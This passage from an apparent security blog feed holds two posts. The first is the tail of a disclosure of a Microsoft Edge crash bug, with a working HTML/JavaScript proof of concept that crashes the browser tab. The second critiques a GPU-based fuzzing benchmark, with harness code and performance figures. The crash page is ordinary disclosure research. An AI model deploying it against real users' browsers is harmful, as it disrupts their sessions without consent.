After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.

Crash reason

Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):

int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
    CTextTrackList::GetTrackNoRef(..., i);
    /* more code... */
}

While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned, it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.

Exploitation

The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.

POC

Here’s a POC that demonstrates the crash. Save it as an html file, and place the test.mp4, foo.vtt files in the same folder.

Tested version:

  • Microsoft Edge 44.18362.449.0
  • Microsoft EdgeHTML 18.18363

<button>Crash</button>
<br><br><br>

<video autoplay controls playsinline>
    <!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
    <track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>

<script>
    // Based on: https://simpl.info/mse/
    var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
    var video = document.querySelector('video');

    var mediaSource = new MediaSource();
    video.src = window.URL.createObjectURL(mediaSource);

    mediaSource.addEventListener('sourceopen', function () {
        var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');

        var button = document.querySelector('button');
        button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);

        get(FILE, function (uInt8Array) {
            var file = new Blob([uInt8Array], {
                type: 'video/mp4'
            });

            var reader = new FileReader();

            reader.onload = function (e) {
                sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
                sourceBuffer.addEventListener('updateend', function () {
                    if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
                        mediaSource.endOfStream();
                    }
                });
            };

            reader.readAsArrayBuffer(file);
        });
    }, false);

    function get(url, callback) {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, true);
        xhr.responseType = 'arraybuffer';
        xhr.send();

        xhr.onload = function () {
            if (xhr.status !== 200) {
                alert('Unexpected status code ' + xhr.status + ' for ' + url);
                return false;
            }
            callback(new Uint8Array(xhr.response));
        };
    }
</script>



Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BPF packet filtering code in libpcap, pcap_filter_with_aux_data. This function is pretty simple: it executes a compiled BPF filter and uses it to extract information and filter a packet.

The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handling virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, and there is much progress to be had! It’s also important to note that Ryan has been doing this research for only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being done and being presented is largely about comparing the performance of libfuzzer, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

The hardware they’re testing on is 2 different Google Cloud compute nodes with different specs. The one used to benchmark libfuzzer is an n1-standard-8, which is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is an NVIDIA Tesla T4 single GPU compute node from Google Cloud Platform. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.

In their blog, they mention that “This isn’t an entirely fair comparison.”, and this largely refers to the fact that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any persistent state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there are a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more variables than should be left uncontrolled in my opinion. It’s also important to note that the blog concludes with a ~4x improvement over libfuzzer, so the result is well within the order-of-magnitude margin that this unfairness introduces.

Of course, if you’ve read my blogs before, you’ll know I absolutely hate comparisons between problems with multiple variables. First of all, mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing at first glance, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away. What is the cost of generating an input from libfuzzer, and what is the cost of the actual function under test? This will effectively tell us how “fair” the execution comparison is. The binary vs source question is subjective, and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}

clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on an Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. That seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, let’s see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
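extern {
    // Returns a u_int in libpcap (the filter result); aux_data is a
    // `const struct bpf_aux_data *`, passed here as an opaque pointer.
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    ) -> u32;
}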

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
        let elapsed = time.elapsed().as_secs_f64();

        println!("{:14.2} packets/second", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, and then call bpf_filter_with_aux_data in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed in a source code zip; this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This, unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.
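The penalty above is just a ratio of two measured rates. A minimal sketch of that arithmetic, using the figures quoted in this post (the helper name `overhead_factor` is made up for illustration):

```rust
/// Ratio between how fast the bare target runs and how fast the harness
/// can run at best (its ceiling when the target does nothing).
fn overhead_factor(target_per_sec: f64, harness_ceiling_per_sec: f64) -> f64 {
    target_per_sec / harness_ceiling_per_sec
}

fn main() {
    // Rates measured above on the Xeon 6252N.
    let native_loop = 18_703_628.46; // bare bpf_filter_with_aux_data loop
    let empty_libfuzzer = 3_121_342.0; // libfuzzer running an empty target

    let factor = overhead_factor(native_loop, empty_libfuzzer);
    println!("libfuzzer overhead factor: {:.2}x", factor);

    // Advantage reported for the GPU fuzzer over libfuzzer (8.4M vs 1.9M).
    let gpu_advantage = 8.4e6 / 1.9e6;
    println!("reported GPU advantage:    {:.2}x", gpu_advantage);
}
```

Since the harness overhead alone is larger than the reported advantage, the comparison mostly measures input generation rather than target execution.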

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.
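To make the "8 VMs per hardware thread" idea concrete, here is a scalar model of one vectorized guest instruction. It is only a sketch: the names `VReg` and `vadd_masked` are hypothetical, and the per-lane mask is an assumption about how diverged VMs could be disabled, not something taken from the real JIT. On real hardware the loop would be a single masked 512-bit add.

```rust
/// Number of 64-bit guest VMs packed into one 512-bit vector register.
const LANES: usize = 512 / 64;

/// One 64-bit guest register, held for all lanes (VMs) at once.
type VReg = [u64; LANES];

/// Lane-wise 64-bit add. Only lanes whose mask bit is set are updated,
/// so VMs that are not executing this instruction keep their old value.
fn vadd_masked(dst: &mut VReg, a: &VReg, b: &VReg, mask: u8) {
    for lane in 0..LANES {
        if mask & (1 << lane) != 0 {
            dst[lane] = a[lane].wrapping_add(b[lane]);
        }
    }
}

fn main() {
    let a: VReg = [0, 1, 2, 3, 4, 5, 6, 7];
    let b: VReg = [10; LANES];
    let mut dst: VReg = [0; LANES];

    // Only the low four VMs execute the add.
    vadd_masked(&mut dst, &a, &b, 0b0000_1111);
    println!("{:?}", dst);
}
```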

Vectorized emulation consists entirely of my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and making rapid changes to internals when needed. But, it also means my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To try to get as close as possible to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there are no specifics about what they used as an input, so we’re making the assumption that using a 1500-byte zeroed out input and simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Given how many “or” conditions are used in the filter, and given the packet doesn’t match any of them, we should be seeing the worst case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was 1.2.3.4, I’d suspect the performance would be improved. Without this being clarified in the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
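extern {
    // Returns a u_int in libpcap (the filter result); aux_data is a
    // `const struct bpf_aux_data *`, passed here as an opaque pointer.
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    ) -> u32;
}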

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

        // Filter a packet
        bpf_filter_with_aux_data(
            program.bf_insns,
            buf.as_ptr(),
            buf.len() as u32,
            buf.len() as u32,
            std::ptr::null()
        );
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf), and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executing, and once it is not, the VM is reset and run again.
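The snapshot-and-reset loop described above can be sketched roughly as follows. This is a toy model, not the emulator's code: the `Vm` type, the flat `Vec<u8>` memory, and the dirty-page list are all assumptions made for illustration. The idea it shows is that a reset only needs to restore the pages a fuzz case actually touched.

```rust
const PAGE_SIZE: usize = 4096;

/// Toy VM whose memory is forked from a snapshot taken at the first breakpoint.
struct Vm {
    memory: Vec<u8>,
    is_dirty: Vec<bool>,     // one flag per page
    dirty_pages: Vec<usize>, // pages written since the last reset
}

impl Vm {
    fn fork_from(snapshot: &[u8]) -> Self {
        assert!(snapshot.len() % PAGE_SIZE == 0, "snapshot must be page aligned");
        Vm {
            memory: snapshot.to_vec(),
            is_dirty: vec![false; snapshot.len() / PAGE_SIZE],
            dirty_pages: Vec::new(),
        }
    }

    /// Guest write: record the page the first time it is dirtied.
    fn write(&mut self, addr: usize, value: u8) {
        let page = addr / PAGE_SIZE;
        if !self.is_dirty[page] {
            self.is_dirty[page] = true;
            self.dirty_pages.push(page);
        }
        self.memory[addr] = value;
    }

    /// Restore only the dirtied pages; returns how many were restored.
    fn reset(&mut self, snapshot: &[u8]) -> usize {
        let restored = self.dirty_pages.len();
        for page in self.dirty_pages.drain(..) {
            let start = page * PAGE_SIZE;
            self.memory[start..start + PAGE_SIZE]
                .copy_from_slice(&snapshot[start..start + PAGE_SIZE]);
            self.is_dirty[page] = false;
        }
        restored
    }
}

fn main() {
    let snapshot = vec![0u8; 4 * PAGE_SIZE];
    let mut vm = Vm::fork_from(&snapshot);
    for case in 0..3u8 {
        // Stand-in for running the target until the return-site breakpoint.
        vm.write(10, case);
        vm.write(2 * PAGE_SIZE + 1, case);
        let restored = vm.reset(&snapshot);
        println!("case {}: restored {} page(s)", case, restored);
    }
}
```

With this shape the reset cost scales with what the target wrote, not with the size of the snapshot, which matters when a fuzz case is only a few microseconds long.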

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core c2-standard-60 (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Platform to make the comparison as apples-to-apples as I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.

Here… we… go!

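[Figure: iterations per second per core (Y axis) against number of cores used (X axis), one line per emulator configuration]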

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with what we ideally want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, nor would I expect one. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.

Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This, of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.
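A rough sketch of what byte-level permissions with uninitialized-memory tracking can look like, assuming one permission byte per memory byte and a "read-after-write" bit that turns into read permission on the first write. The `Memory` type, the flag names and the `Fault` enum are all invented for this example and say nothing about the real layout used by the JIT.

```rust
const PERM_READ: u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
/// Read-after-write: the byte becomes readable only once it has been written.
const PERM_RAW: u8 = 1 << 2;

#[derive(Debug, PartialEq)]
enum Fault {
    OutOfBounds,
    Read(usize),
    Write(usize),
    Uninit(usize),
}

struct Memory {
    bytes: Vec<u8>,
    perms: Vec<u8>, // one permission byte per memory byte
}

impl Memory {
    fn new(size: usize) -> Self {
        Memory { bytes: vec![0; size], perms: vec![0; size] }
    }

    fn range(&self, addr: usize, len: usize) -> Result<std::ops::Range<usize>, Fault> {
        match addr.checked_add(len) {
            Some(end) if end <= self.bytes.len() => Ok(addr..end),
            _ => Err(Fault::OutOfBounds),
        }
    }

    fn set_perms(&mut self, addr: usize, len: usize, perms: u8) -> Result<(), Fault> {
        let range = self.range(addr, len)?;
        self.perms[range].fill(perms);
        Ok(())
    }

    fn write(&mut self, addr: usize, data: &[u8]) -> Result<(), Fault> {
        let range = self.range(addr, data.len())?;
        // Check every byte before touching memory so a faulting write is atomic.
        if let Some(bad) = range.clone().find(|&a| self.perms[a] & PERM_WRITE == 0) {
            return Err(Fault::Write(bad));
        }
        self.bytes[range.clone()].copy_from_slice(data);
        for perm in &mut self.perms[range] {
            if *perm & PERM_RAW != 0 {
                *perm |= PERM_READ; // written at least once, now initialized
            }
        }
        Ok(())
    }

    fn read(&self, addr: usize, len: usize) -> Result<&[u8], Fault> {
        let range = self.range(addr, len)?;
        for a in range.clone() {
            let perm = self.perms[a];
            if perm & PERM_READ == 0 {
                return Err(if perm & PERM_RAW != 0 { Fault::Uninit(a) } else { Fault::Read(a) });
            }
        }
        Ok(&self.bytes[range])
    }
}

fn main() {
    let mut mem = Memory::new(16);
    // A fresh 8-byte allocation: writable, readable only after being written.
    mem.set_perms(4, 8, PERM_WRITE | PERM_RAW).unwrap();
    // Punch a one-byte hole in the middle of it.
    mem.set_perms(8, 1, 0).unwrap();

    println!("{:?}", mem.read(4, 1)); // read of uninitialized memory
    println!("{:?}", mem.write(4, &[1, 2]));
    println!("{:?}", mem.read(4, 2));
    println!("{:?}", mem.write(7, &[9, 9])); // straddles the hole
}
```

The one-byte hole in the middle of the allocation is the case a shadow-memory scheme with coarser granularity cannot express, and the per-byte check on every access is where the performance cost comes from.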

Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.
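The horizontal comparison can be modelled in a few lines, assuming each of the 8 lanes runs the same code on a different input. If the lanes disagree about a register's value, the input must have influenced it. The function name `lanes_diverge` is hypothetical.

```rust
const LANES: usize = 8;

/// Returns true when at least one VM holds a different value in this
/// register than its neighbours, i.e. the register depends on the input.
fn lanes_diverge(values: &[u64; LANES]) -> bool {
    values.iter().any(|&v| v != values[0])
}

fn main() {
    // A loop counter that is identical in every VM: not influenced by input.
    let counter = [3u64; LANES];
    // A byte loaded from each VM's own input: influenced by input.
    let loaded = [0x41, 0x41, 0x42, 0x41, 0x00, 0x41, 0x41, 0x7f];

    println!("counter tainted: {}", lanes_diverge(&counter));
    println!("loaded tainted:  {}", lanes_diverge(&loaded));
}
```

Note that this kind of check can only report influence that the current set of inputs actually exercises; identical values across lanes do not prove a register is independent of the input.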

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but the number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.

This gives vectorized emulation about a 3x advantage for performance per dollar compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.
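The cost normalization used above is a single division per machine. A small sketch with the rounded figures from this post as inputs (so the last digit may differ slightly from the quoted numbers); the function name is made up:

```rust
/// Throughput normalized by hourly rental price: iters/second per ($/hour).
fn iters_per_dollar_hour(iters_per_sec: f64, dollars_per_hour: f64) -> f64 {
    iters_per_sec / dollars_per_hour
}

fn main() {
    // c2-standard-60 running vectorized emulation with byte-level permissions.
    let vecemu = iters_per_dollar_hour(250e6, 3.1321);
    // Tesla T4 node, using the throughput reported in the ToB blog.
    let gpu = iters_per_dollar_hour(8.4e6, 0.35);

    println!("vecemu: {:.1}M iters/s per $/hour", vecemu / 1e6);
    println!("gpu:    {:.1}M iters/s per $/hour", gpu / 1e6);
    println!("ratio:  {:.1}x", vecemu / gpu);
}
```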

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all modified memory by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pushing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur, and reclaiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target, I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.
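For a sense of scale, the per-worker memory budgets in the paragraph above can be worked out with integer division. This is only the arithmetic from the text; the helper name is hypothetical.

```rust
const KIB: u64 = 1024;
const MIB: u64 = 1024 * KIB;
const GIB: u64 = 1024 * MIB;

/// Even split of a memory pool across workers (GPU threads or VMs).
fn bytes_per_worker(total_bytes: u64, workers: u64) -> u64 {
    total_bytes / workers
}

fn main() {
    // 16 GiB GPU shared by 40,000 threads.
    let gpu = bytes_per_worker(16 * GIB, 40_000);
    // 50 GiB of host memory shared by 1,536 vectorized VMs.
    let vecemu = bytes_per_worker(50 * GIB, 1_536);

    println!("GPU thread: {} KiB", gpu / KIB);
    println!("vecemu VM:  {} MiB", vecemu / MIB);
}
```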

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reducing the number of threads. There are definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, which makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about 3x of native execution (18M packets/second in the native libpcap harness from earlier, 5.5M with vectorized emulation). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target against libfuzzer performing orchestration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.
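The batching trick mentioned above looks roughly like this. It is a simplified sketch: it flushes a thread-local count every `BATCH` cases rather than on a timer, and `run_workers` and `BATCH` are names invented for the example.

```rust
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;
use std::thread;

/// Number of fuzz cases each thread counts locally before publishing.
const BATCH: u64 = 1 << 16;

/// Runs `threads` workers for `cases_per_thread` cases each and returns the
/// total recorded in the shared counter.
fn run_workers(threads: usize, cases_per_thread: u64) -> u64 {
    let total = Arc::new(AtomicU64::new(0));

    let handles: Vec<_> = (0..threads)
        .map(|_| {
            let total = Arc::clone(&total);
            thread::spawn(move || {
                let mut local = 0u64;
                for _ in 0..cases_per_thread {
                    // ... one fuzz case would run here ...
                    local += 1;
                    if local == BATCH {
                        // One contended atomic update per BATCH cases
                        // instead of one per case.
                        total.fetch_add(local, Ordering::Relaxed);
                        local = 0;
                    }
                }
                // Publish whatever is left over.
                total.fetch_add(local, Ordering::Relaxed);
            })
        })
        .collect();

    for handle in handles {
        handle.join().unwrap();
    }
    total.load(Ordering::Relaxed)
}

fn main() {
    println!("{} cases recorded", run_workers(4, 1_000_000));
}
```

The shared cache line holding the counter is then touched a handful of times per second per thread instead of millions, which is the difference between the counter being free and it dominating the harness.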

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers more easily than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Platform. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?

